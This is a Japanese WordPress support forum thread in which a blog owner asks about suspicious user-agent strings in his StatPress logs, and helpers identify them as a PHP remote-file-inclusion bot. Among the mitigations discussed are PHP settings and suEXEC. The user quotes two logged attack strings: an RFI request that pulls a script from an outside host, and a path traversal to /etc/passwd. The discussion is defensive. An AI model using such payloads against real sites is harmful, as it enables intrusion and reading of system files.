サポート » その他 » 不審なユーザーエージェント

  • 解決済 o6asan

    (@o6asan)


    はじめまして。

    WordPress2.9.2日本語版上で,StatPress Reloaded1.5.21を使用しています。
    今朝ほどログを見たときに「直近のユーザエージェント」欄のユーザーエージェントに
    http://ja.pastebin.ca/1880350
    にアップしたようなものが見られました。自分のブログのファイルに改変されたような点は
    見られませんが,これは何でしょうか。放っておいてもいいでしょうか。情報がありましたら,
    よろしくお願いいたします。

8件の返信を表示中 - 1 - 8件目 (全8件中)
  • これはUNIXコマンドを使った外部プログラムを実行する内容になっているし、$filevirusなんていう怖ろしそうな変数もあるので、サーバー運営者側に直接報告して安全なのかどうか問い合わせた方がよいと思います(IRCサーバーと何の関係があるんでしょうかね?ボットネット?)。

    スレッド開始 o6asan

    (@o6asan)

    akihiroさん,お返事ありがとうございます。

    先ほど帰宅し,すぐに運営者にメールを送りました。
    現在,回答待ちです。

    > (IRCサーバーと何の関係があるんでしょうかね?ボットネット?)

    が分からないのですが,関係ありそうな記述があるのですか。

    スレッド開始 o6asan

    (@o6asan)

    こんにちは。

    まだ,あまり,国内での報告例はないようですが,こんなページを見つけました。
    http://botnetzprovider.de/cnc1.html
    やはり,どうやら,phpのRFIの脆弱性を利用するbotのようですね。

    私は,WordPressとは別のドメインでにMT上の英語ブロクを立てているのですが,そこから流れて来るビジターも多いので,このポットもその絡みかもしれません。

    運営者からはまだ何も応答がありませんが,見つけた件について連絡して見ようと思います。
    allow_url_fopen
    register_globals
    allow_url_include
    あたりがoffであれば大丈夫だと思いますが,自分のサーバがポットネットの一員にされるのは嫌ですから。

    ああ、紛らわしい独り言を付け加えてしまってすみませんでした。
    実は私もこのページを見つけてボソボソつぶやいてしまった次第です。

    allow_url_fopen
    register_globals
    allow_url_include
    あたりがoffであれば大丈夫だと思いますが,自分のサーバがポットネットの一員にされるのは嫌ですから。

    なるほど。RFI脆弱性ですか。
    allow_url_fopen、register_globals、allow_url_includeならphpinfo()で確認できます。
    <?php phpinfo(); ?>を使ってもいいし、プラグインで確認できるものもあります。

    スレッド開始 o6asan

    (@o6asan)

    akihiroさん,こんばんは。

    phpinfo()で確認してみました。
    allow_url_fopen=On
    register_globals=Off
    allow_url_include 不明
    でした。

    サーバのPHPは5.1.6なので,ちょっと気がかりです。他のものとのかかわりでどの程度の安全性が保たれているのか。

    WordPressやそのプラグイン等の,PHPのプログラミングはどうなんでしょうか。
    入力チェックをどのくらいしっかりやってくれているのかな。

    スレッド開始 o6asan

    (@o6asan)

    こんばんは。
    サポートから,返事がきました。

    o6asan様
    xxxxxxx.xx のご利用ありがとうございます。
    また、詳細のご報告誠に恐れ入ります。

    PHP(Apacheなど含め)については、アップデートなどの対応を行っており、
    また弊社ホスティングについては、限定条件(SafeModeやSuExec)などが多い(利
    用しづらい面もありご迷惑をおかけしているかと思いますが。)こともあり、
    下記部分については、現時点では問題は出ていないと思われます。

    他何かお気づきの点などございましたらご報告いただけますと幸いです。
    また、今後はサーバー強化なども検討(予定)しております、引き続きxxxxxxx.xx
    をご愛顧いただけますようお願いいたします。
    よろしくお願いいたします。

    ということでした。

    “option=com_myblog&task=http://www.askoracle.net/casper/casper.txt?”
    “option=com_myblog&task=../../../../../../../../../../../../../../../etc/passwd%00”
    というあたりをもう少し詳しく記入して,エラーコード等を詳しく教えてくれるように依頼したのですが,上記のような回答で少し不満ですが,このあたりで納得しないと仕方ないですかね。

    o6asanさん、とりあえずご無事そうでなにより、お疲れさまでした。

    suEXEC は、Apache web サーバから呼び出される setuid された “wrapper” プログラムが基本となっています。設計した CGI、または SSI プログラムへの HTTP リクエストがあると、この wrapper が呼び出されます。このようなリクエストがあると、Apache はそのプログラムが実行される際のプログラム名とユーザ ID とグループ ID を指定して suEXEC wrapper を実行します。

    それから、wrapper は成功または失敗を決定するため 以下の処理を行ないます。これらの状態のうち一つでも失敗した場合、 プログラムは失敗をログに記録してエラーで終了します

    参照:suEXECセキュリティモデル|suEXEC サポート|Apache HTTP サーバ バージョン 2.0

    サーバーのApacheのヴァージョンは分かりませんが↑ここで止められたと解釈できそうですね。register_globalsもOffであることですし、サイトの環境面はこうしたサイト改ざんに対して配慮されている、と信じてもよいのではないかと思われます。

    文献ちょっと古いですが→『register_globals = On の恐怖』。環境面もよくチェックしておかないと安心できないものですねぇ…。phpのバージョンなどが新しければ大丈夫かといえばそうでもなく、サーバー側で変更しているケースもあるようです。

    あ、申し訳ありません。解決済みでした…。

    スレッド開始 o6asan

    (@o6asan)

    akihiroさん,こんばんは。

    > あ、申し訳ありません。解決済みでした…。

    いえ,ありがとうございました。
    ところで,Apacheのヴァージョンは2.2.3のようです。

    > phpのバージョンなどが新しければ大丈夫かといえばそうでもなく……

    そうなんですよね。それは言えます。大手だから大丈夫ともいえませんよね。
    今年,WordPressがらみでは,Network Solutionの大騒ぎもありましたし。

    まぁ,SafeModeやSuExecのこともあるので,信用してもいいかなとは思っているのですが……

    こちらの勉強のためにもう少し詳しいことを知りたかったなというのが,本音です。
    サポート側としては,部外者にあまり詳しいことを教えることは,セキュリティ上別の問題だという意識もあるかもしれません。

8件の返信を表示中 - 1 - 8件目 (全8件中)
  • トピック「不審なユーザーエージェント」には新たに返信することはできません。